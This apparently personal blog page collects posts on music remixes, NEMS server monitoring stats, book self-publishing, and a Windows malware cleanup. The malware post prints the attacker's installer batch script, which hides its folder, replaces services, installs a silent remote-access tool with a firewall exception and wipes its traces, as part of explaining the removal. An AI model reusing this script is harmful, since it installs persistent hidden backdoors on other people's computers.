Gareth Emery ft. Wayward Daughter – Reckless (BL3R Remix)

Posted on October 3, 2017 by Robbie Ferguson

I. Love. This. Song!!

Some tracks just demand my player warning of permanent hearing damage, and this is one of them. When the bass comes in and my eardrums tingle, I know I’m where I want to be.

That beat drop at 1:24 and subsequent synth squelches makes me excited to be alive. And her voice… oh, her voice. Wayward Daughter shows us why Vocal Dubstep is the genre of choice for those of us who love and appreciate true melodic dubstep and talented vocal chops.

Gareth brings in the synth with old school frequency envelopes that seamlessly meld 2017 with 1998.

Enjoy! You can thank me later.

Bad SD cards in a NEMS Server Raspberry Pi

Posted on September 22, 2017 by Robbie Ferguson

With the coming release of NEMS 1.3, the retroactive stats system was implemented to allow me a way to see how many systems have been upgraded, and if any are having trouble.

Now, behind the scenes, I also developed the anonymous stats system as a way for me to gauge system load on various platforms.

Why would I do that? Because NEMS is branching out onto other SBC’s, starting with the ODROID XU4.

The fact remains, I often get the question “How many hosts can I add to NEMS” and the truth is, I have no idea! I’ve received great feedback from users who are monitoring 100+ hosts on a Raspberry Pi NEMS server, but otherwise I don’t really know much about what’s actually going on in the real world of NEMS.

So the stats system shows me, anonymously, how NEMS is being used, and how it is performing.

So, that system has been running for a few days, and today I began seeing some alerts: some users have bad SD cards!

This is causing their NEMS server to run very, very slowly.

If your NEMS server is running slowly, you may be one of these! Remember, the stats are anonymous, so I can’t contact you.

I’ve considered making the stats system able to send back a response to your NEMS server… that way, even though it’s anonymous and I don’t know who you are, I can have the system programmatically warn you that your card is failing.

It’s really quite cool for me to see how NEMS is being used. So far more than 100 NEMS servers have reported in with their current statistics, and many are running more than 100 nagios monitors with a 0.01 load average.

So back to my comment about branching out to other SBCs and knowing how many hosts we can handle on NEMS: the fact is, now that I will have real world statistical data, I will be able to put together proper information about how many services can be running on NEMS on various platforms! It’ll start with the Pi 3 obviously, but I’ll be able to see for example, how a NEMS server with 500 hosts has a higher load than one with 100, so we can therefore recommend if you have 500 hosts or more, you should install on an ODROID XU4 (for example). I’ll also be creating new graphs that show comparisons of various platforms, performance graphs over time, averages based on user deployments, and so-on. Really exciting stuff!

Thanks for using NEMS! If you have any questions, I’m here for you!

Robbie

A nasty piece of work in C:\ProgramData\WindowsWork

Posted on September 15, 2017 by Robbie Ferguson

I encountered a nasty bit of malware today which wasn’t being seen by antivirus. Malwarebytes was popping up every 5 seconds with a warning that some executable file on Windows 10 was trying to reach a blocked web site… tektonit.ru

A quick Google search made it clear that the domain being contacted is associated with the Troj/RemAdm-AG and Backdoor.Gussdoor trojans, the second of which opens a backdoor to the domain in question. The attacker then has access to read and write files, access the registry, spawn processes and even take screenshots. In our case, they also installed keylogger.bestfreekeylogger.a which lets them record keystrokes like passwords, credit card numbers, emails, or any other content entered via the computer.

Nasty.

The user had both a McAfee antivirus product and Avast Free installed. Neither of which were really complaining about the threat, yet Malwarebytes continued its little dance in the corner “Website blocked – Domain: tektonit.ru” and variants thereof.

Malwarebytes also did something else nice for me: it showed the process location. It was running a file in C:\ProgramData\WindowsWork, which to an end-user appears to not exist if you try to navigate to it.

I installed ESET Internet Security, which picked up and removed the keylogger (two variants) that the other applications left behind, but the malware reaching out to the attacking server was not detected.

Jumping into an admin terminal, the directory doesn’t show since its attributes are set to +s +h (system, hidden). Within the folder, the files themselves are also hidden and set with the system attribute, making them pretty much invisible to end users. And strangely, antivirus also did not see it.

Removing the attributes, I was now able to see and open the files. One such file was the installer used to deploy the malware.

Here’s how it installed itself:

@echo off
attrib +s +h "C:\ProgramData\WindowsWork"
cd C:\ProgramData\WindowsWork\
 
sc stop RManService
sc stop ServiceWork
sc delete RManService
sc delete ServiceWork
taskkill /im rfusclient.exe /f
taskkill /im rutserv.exe /f
reg delete "HKLM\SYSTEM\System Information\Driver" /f
 
regedit /s "C:\ProgramData\WindowsWork\config_set.reg"
"C:\ProgramData\WindowsWork\syswork.exe" /silentinstall
"C:\ProgramData\WindowsWork\syswork.exe" /firewall
regedit /s "C:\ProgramData\WindowsWork\config_set.reg"
sc failure ServiceWork reset= 0 actions= restart/1000/restart/1000/restart/1000
sc config ServiceWork obj= LocalSystem type= interact type= own
"C:\ProgramData\WindowsWork\syswork.exe" /start
 
del C:\ProgramData\WindowsWork\config_set.reg /q
del C:\ProgramData\WindowsWork\WinUpdate.exe /q
del C:\ProgramData\WindowsWork\WorkInstall2.bat /q
attrib +s +h "C:\ProgramData\WindowsWork\*.*"
del C:\ProgramData\WindowsWork\WorkInstall.bat /q
 
exit

Interesting, in that this now sheds some light on why antivirus isn’t picking it up… it’s likely not even a virus. And to boot, UAC would have stopped this script from running, which means the end user had to have allowed it. Once again proves my point that Windows UAC is useless because novice users will just say yes to any stinking dialogue you throw at them!

So the script, as you can see, destroys legitimate Windows services and replaces them with itself. That makes it tough to detect.

I killed the services, deleted the services, and then purged all the files in the C:\ProgramData\WindowsWork\ and removed the folder. Instantly, Malwarebytes went to sleep.

A reboot and full system scan as administrator with ESET Internet Security, and all looks well. Hopefully the firewall in EIS will do a better job of keeping the user from answering “Yes” to the wrong questions… but ultimately it’s up to educating users to think, and understand, before clicking.

The malware is gone. However, there’s no way to know how far the attacker got. It appears as though the service files were not viruses at all, but rather basic programs that reach out to tektonit.ru to obtain legitimate malware and install it. Basically, the stuff in C:\ProgramData\WindowsWork\, which the user authorized being installed, was benign from an antimalware standpoint. It was not a virus: it was a tool being used by an attacker to propagate their tools, malware and possibly viruses/trojans. But because of the nature of it, it also worked as a bit of a smokescreen.

In this instance, had Malwarebytes’ Premium version not been installed (which does active protection, not just on-demand scanning), the user would have been wide open to the smokescreen application and its desire to install all kinds of unknowns on the user’s system.

ESET Internet Security is now installed, along with Malwarebytes Premium. These two products combined should provide about the best level of protection available to Windows users today.

Get ESET Internet Security: https://cat5.tv/esetus

Get Malwarebytes Premium: http://amzn.to/2x2HCz2

My Wife, The Author: My Adventures in Book Publication

Posted on August 31, 2017 by Robbie Ferguson

When my wife and I married in 2001, I knew she had a passion for writing.

One of the first things she wrote was an account of our love story, and how we met on ICQ; one of the early instant messenger apps before MSN, Facebook or Twitter existed. To allow her to have a printed copy of the account, called I Seek You, I taught myself how to use Cafepress, and I began my first quest at self-publication.

Then, 2006 came around, which brought about the culmination of several years work for Bekah. Having teamed up with her sister, Abigail, her first full-length novel, Weeping Willow, was released, followed in the same year by her independent novel, based in Toronto called The Starfish. To make it possible, I’d used what I had learned to publish them both via CafePress, and two beautiful new paperbacks with my wife’s name on their spine adorned our book shelf… later followed by another, another, and yet another.

Throughout the process over the years, I was able to establish ourselves with Library Archives Canada, basically making us an “official” Canadian book publishing company. One of the coolest features of this affiliation is that I could now issue my own ISBN and later, ISBN-13 codes. In other words, I didn’t have to pay someone else a hefty fee to register Bekah’s books, and we could now print our own barcodes which allowed us to sell them.

So that’s a quick bit of backstory for you as to how I got into self-publishing novels. I’ve personally grown and evolved my abilities, and am always, for the sake of my wife’s readers, working hard to make our publications as professional looking as possible.

By the time Bekah was ready to release her biggest release to date, A White Rose in 2012, I’d been able to really step things up in the publishing department, doing away with CafePress entirely, and working directly with what we called the “world’s biggest book store” at the time, Amazon. Suddenly, not only were Bekah’s books available for purchase all around the world through Amazon’s family of sites, but also available on their Kindle e-reader. The printing itself is done through a child company of Amazon called CreateSpace.

Side Note: I’ll say now, self-publication is not for everyone. If you’re reading this and thinking “Wow, I can publish my own books with these sites,” you should know it has taken 11 years for me, a teacher of tech and full-time tech industry worker, to learn the ins-and-outs of the process, and to get to the quality of publication that I am at today. Maybe one day, someone will request that I edit and publish their book for them. That’d be cool. In all honesty, the bill would be at least $2,000 to do it, just for the labor. Hope that gives you an idea of how much work is actually involved.

So, this month, August 2017, is another big one for our “publishing house”–called Rock of Ages Publishing House, named after the popular online radio station I founded and ran for many years in the early days of online radio.

After countless hours, we have released not one, but two new novels this month.

The first is Bekah’s newest and proudest work, When The Fog Cleared. We call it a Christian Romance as far as genres are concerned, but Bekah’s very “non-preachy” approach to faith is truly unmatched. It’s not, in my opinion, a Christian Romance in the traditional sense, but rather, a beautiful romance and story of true love, involving a Christian character. If you’ve read Bekah’s books before, you already know she creates characters who you feel you know like a real person. The people in her book are so real to the reader, it’s kinda mind-blowing. You’ve got to read it.

The second is another joint effort, this time with her other sister, Rachel Xu. And it’s a long time coming! They finished writing it in 2014, and I’ve finally been able to edit and publish it. This one is a Mainstream Fantasy. Creatures, wild things, and a Gothic mansion. Need I say more? The Attic is such a fun read that you will definitely want to get the paperback just so you can keep it on your bookshelf or share it with friends.

So how did I publish two novels in just one month?

I locked in. Many, many hours with my Rebel BT’s, my playlist, and my laptop computer. I did everything using open source software. The GIMP was used to create all the cover art, and I used LibreOffice Writer to actually create the layouts and files. That bit was brutal… figuring out margins and pagination, making sure you have the book or author name at the top of the appropriate pages, but not at the top of chapter pages. I even took special care to ensure there was just enough room at the edge of the page that your fingers wouldn’t obstruct the text, and just a bit more near the binding to ensure the text doesn’t run into the fold. It was a lot of work to setup. But I did it all for When The Fog Cleared. Then, having gotten through that novel, I took the files I had created and imported the text for The Attic, which was long overdue for public release. Recycling the same layouts, the same master files, and the same dimensions, saved hours upon hours of work, and gave me a very good looking layout (as I’d spent so much time creating the format). I then did all the edits from our notes, reformatted the break point artwork, and through an onerous process of back and forth with the editors, I was able to complete our second publication this month.

I hope you love both novels, and can’t wait to start seeing your (5/5?) reviews on Amazon! Thanks for reading!

Robbie

WHEN THE FOG CLEARED – http://amzn.to/2etypZf
When Kylie Cadore arrived at her father’s Georgian home in Bermuda for a summer vacation, she wasn’t expecting to find his common-law wife, Pearl, hiding a mysterious illness from him. And a handsome cousin. Having journeyed to the island after several months of separation from her husband, Drew, Kylie hoped to gain clarity amidst the palm trees and sandy shores. Instead she found herself drawn like a magnet to the charms of Pearl’s cousin, a cruise ship pianist. When Drew unexpectedly shows up on the island a couple of weeks later, Kylie’s heart is torn between the prospect of a new romance, and still loving the man who broke her heart.

THE ATTIC – http://amzn.to/2wmR5jE
When Lily Kline takes possession of a Gothic estate with Ian Hawke, her co-heir and a stranger, she soon realizes there is more than meets the eye within the many corridors of the sequestered mansion. Ian is aloof and even hostile at times, and though he warns about rabid wolves in the forest, as though trying to frighten her away, she can’t help being drawn to him. As events grow more bizarre, she questions her safety and Ian’s identity. Why did her late Grandfather see fit to make them co-heirs? Furthermore, what lurks in the attic, that hidden room everyone takes pains for her to avoid?

The Eden Project – Lost

Posted on August 15, 2017 by Robbie Ferguson

I know, I know… I seem to be on an Eden kick. But like John 3:16, there’s a lot of power in Lost 3:16. 😉 Heh. Yeah, skip to 3m16s and you’ll see what I mean. That bit keeps me coming back again and again. Then, at 3:46 I basically melt. I can’t stop looping this track. I have to admit, I’m digging The Eden Project big time.

360 Video for Immersive Nature Sounds

Posted on July 14, 2017 by Robbie Ferguson

Our show, Nature Sounds of Ontario, Canada is changing to Immersive Nature Sounds, and will feature 360-Video along with the binaural 3D audio of nature recordings! Continue reading →

Mako – Way Back Home (WE ARE FURY Remix)

Posted on July 11, 2017 by Robbie Ferguson

One thing that always gets me is really. tight. harmonies. Mako had it on the original of Way Back Home, but I wanted something with a bit more intensity (it’s a pretty mellow track). Enter Trap Nation with the WE ARE FURY remix of Mako’s classic.

Take the intense harmonies of the original track, bring in a breakbeat, dubstep vocal chops, and an epic battle style for something I just can’t listen to without my phone warning me that “Listening at high volume for a long time may damage your hearing.”

That said, the original still gives me goosebumps.

Birdy – Skinny Love (Vanic Remix)

Posted on June 27, 2017 by Robbie Ferguson

Time to turn up your speakers! This is a great remix. It’s a 5-minute crescendo that doesn’t stop oozing awesomesauce. Just when you think it’s starting to drip, Vanic turns back on the tap. Birdy has a great vocal, and the bassline build coupled with the unexpected (but oh, so welcome) dubstep breakdown makes it impossible for me to turn off the repeat feature.

For those interested in a little history lesson, here’s the original version of the song.

Why support may ask for your backup.nems file, and why you should never share it with others

Posted on June 20, 2017 by Robbie Ferguson

During support sessions I often request either SSH access or a copy of the user’s backup.nems file. SSH access, it should be obvious, should not be shared with just anyone. Also, you should never, ever, ever, open SSH to the world on your NEMS server if you have not yet initialized it. This is because there are botnets that look for Raspberry Pi computers which use the default “raspberry” password, and then compromize them. Continue reading →

Sound Of Walking Away – Illenium ft. Kerli

Posted on May 30, 2017 by Robbie Ferguson

I love how Kerli just rips through this track. She has such a wicked tone. That high vocal before the beat drops? YES! And Illenium does it again. SFW.

Bald Nerd

The Musings of Robbie Ferguson